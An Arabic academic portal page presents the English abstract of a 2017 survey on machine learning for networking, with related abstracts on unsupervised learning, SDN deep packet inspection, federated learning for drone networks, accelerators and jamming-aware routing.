ترغب بنشر مسار تعليمي؟ اضغط هنا

Machine Learning for Networking: Workflow, Advances and Opportunities

64   0   0.0 ( 0 )
 نشر من قبل Mowei Wang
 تاريخ النشر 2017
  مجال البحث الهندسة المعلوماتية
والبحث باللغة English




اسأل ChatGPT حول البحث

Recently, machine learning has been used in every possible field to leverage its amazing power. For a long time, the net-working and distributed computing system is the key infrastructure to provide efficient computational resource for machine learning. Networking itself can also benefit from this promising technology. This article focuses on the application of Machine Learning techniques for Networking (MLN), which can not only help solve the intractable old network questions but also stimulate new network applications. In this article, we summarize the basic workflow to explain how to apply the machine learning technology in the networking domain. Then we provide a selective survey of the latest representative advances with explanations on their design principles and benefits. These advances are divided into several network design objectives and the detailed information of how they perform in each step of MLN workflow is presented. Finally, we shed light on the new opportunities on networking design and community building of this new inter-discipline. Our goal is to provide a broad research guideline on networking with machine learning to help and motivate researchers to develop innovative algorithms, standards and frameworks.

قيم البحث

اقرأ أيضاً

While machine learning and artificial intelligence have long been applied in networking research, the bulk of such works has focused on supervised learning. Recently there has been a rising trend of employing unsupervised machine learning using unstr uctured raw network data to improve network performance and provide services such as traffic engineering, anomaly detection, Internet traffic classification, and quality of service optimization. The interest in applying unsupervised learning techniques in networking emerges from their great success in other fields such as computer vision, natural language processing, speech recognition, and optimal control (e.g., for developing autonomous self-driving cars). Unsupervised learning is interesting since it can unconstrain us from the need of labeled data and manual handcrafted feature engineering thereby facilitating flexible, general, and automated methods of machine learning. The focus of this survey paper is to provide an overview of the applications of unsupervised learning in the domain of networking. We provide a comprehensive survey highlighting the recent advancements in unsupervised learning techniques and describe their applications for various learning tasks in the context of networking. We also provide a discussion on future directions and open research issues, while also identifying potential pitfalls. While a few survey papers focusing on the applications of machine learning in networking have previously been published, a survey of similar scope and breadth is missing in literature. Through this paper, we advance the state of knowledge by carefully synthesizing the insights from these survey papers while also providing contemporary coverage of recent advances.
Deep packet inspection (DPI) has been extensively investigated in software-defined networking (SDN) as complicated attacks may intractably inject malicious payloads in the packets. Existing proprietary pattern-based or port-based third-party DPI tool s can suffer from limitations in efficiently processing a large volume of data traffic. In this paper, a novel OpenFlow-enabled deep packet inspection (OFDPI) approach is proposed based on the SDN paradigm to provide adaptive and efficient packet inspection. First, OFDPI prescribes an early detection at the flow-level granularity by checking the IP addresses of each new flow via OpenFlow protocols. Then, OFDPI allows for deep packet inspection at the packet-level granularity: (i) for unencrypted packets, OFDPI extracts the features of accessible payloads, including tri-gram frequency based on Term Frequency and Inverted Document Frequency (TF-IDF) and linguistic features. These features are concatenated into a sparse matrix representation and are then applied to train a binary classifier with logistic regression rather than matching with specific pattern combinations. In order to balance the detection accuracy and performance bottleneck of the SDN controller, OFDPI introduces an adaptive packet sampling window based on the linear prediction; and (ii) for encrypted packets, OFDPI extracts notable features of packets and then trains a binary classifier with a decision tree, instead of decrypting the encrypted traffic to weaken user privacy. A prototype of OFDPI is implemented on the Ryu SDN controller and the Mininet platform. The performance and the overhead of the proposed sulotion are assessed using the real-world datasets through experiments. The numerical results indicate that OFDPI can provide a significant improvement in detection accuracy with acceptable overheads.
Unmanned aerial vehicles (UAVs), or say drones, are envisioned to support extensive applications in next-generation wireless networks in both civil and military fields. Empowering UAVs networks intelligence by artificial intelligence (AI) especially machine learning (ML) techniques is inevitable and appealing to enable the aforementioned applications. To solve the problems of traditional cloud-centric ML for UAV networks such as privacy concern, unacceptable latency, and resource burden, a distributed ML technique, textit(i.e.), federated learning (FL), has been recently proposed to enable multiple UAVs to collaboratively train ML model without letting out raw data. However, almost all existing FL paradigms are still centralized, textit{i.e.}, a central entity is in charge of ML model aggregation and fusion over the whole network, which could result in the issue of a single point of failure and are inappropriate to UAV networks with both unreliable nodes and links. Thus motivated, in this article, we propose a novel architecture called DFL-UN (underline{D}ecentralized underline{F}ederated underline{L}earning for underline{U}AV underline{N}etworks), which enables FL within UAV networks without a central entity. We also conduct a preliminary simulation study to validate the feasibility and effectiveness of the DFL-UN architecture. Finally, we discuss the main challenges and potential research directions in the DFL-UN.
Machine learning (ML) is a subfield of artificial intelligence. The term applies broadly to a collection of computational algorithms and techniques that train systems from raw data rather than a priori models. ML techniques are now technologically ma ture enough to be applied to particle accelerators, and we expect that ML will become an increasingly valuable tool to meet new demands for beam energy, brightness, and stability. The intent of this white paper is to provide a high-level introduction to problems in accelerator science and operation where incorporating ML-based approaches may provide significant benefit. We review ML techniques currently being investigated at particle accelerator facilities, and we place specific emphasis on active research efforts and promising exploratory results. We also identify new applications and discuss their feasibility, along with the required data and infrastructure strategies. We conclude with a set of guidelines and recommendations for laboratory managers and administrators, emphasizing the logistical and technological requirements for successfully adopting this technology. This white paper also serves as a summary of the discussion from a recent workshop held at SLAC on ML for particle accelerators.
The problem of quality of service (QoS) and jamming-aware communications is considered in an adversarial wireless network subject to external eavesdropping and jamming attacks. To ensure robust communication against jamming, an interference-aware rou ting protocol is developed that allows nodes to avoid communication holes created by jamming attacks. Then, a distributed cooperation framework, based on deep reinforcement learning, is proposed that allows nodes to assess network conditions and make deep learning-driven, distributed, and real-time decisions on whether to participate in data communications, defend the network against jamming and eavesdropping attacks, or jam other transmissions. The objective is to maximize the network performance that incorporates throughput, energy efficiency, delay, and security metrics. Simulation results show that the proposed jamming-aware routing approach is robust against jamming and when throughput is prioritized, the proposed deep reinforcement learning approach can achieve significant (measured as three-fold) increase in throughput, compared to a benchmark policy with fixed roles assigned to nodes.
التعليقات
جاري جلب التعليقات جاري جلب التعليقات
سجل دخول لتتمكن من متابعة معايير البحث التي قمت باختيارها
mircosoft-partner

هل ترغب بارسال اشعارات عن اخر التحديثات في شمرا-اكاديميا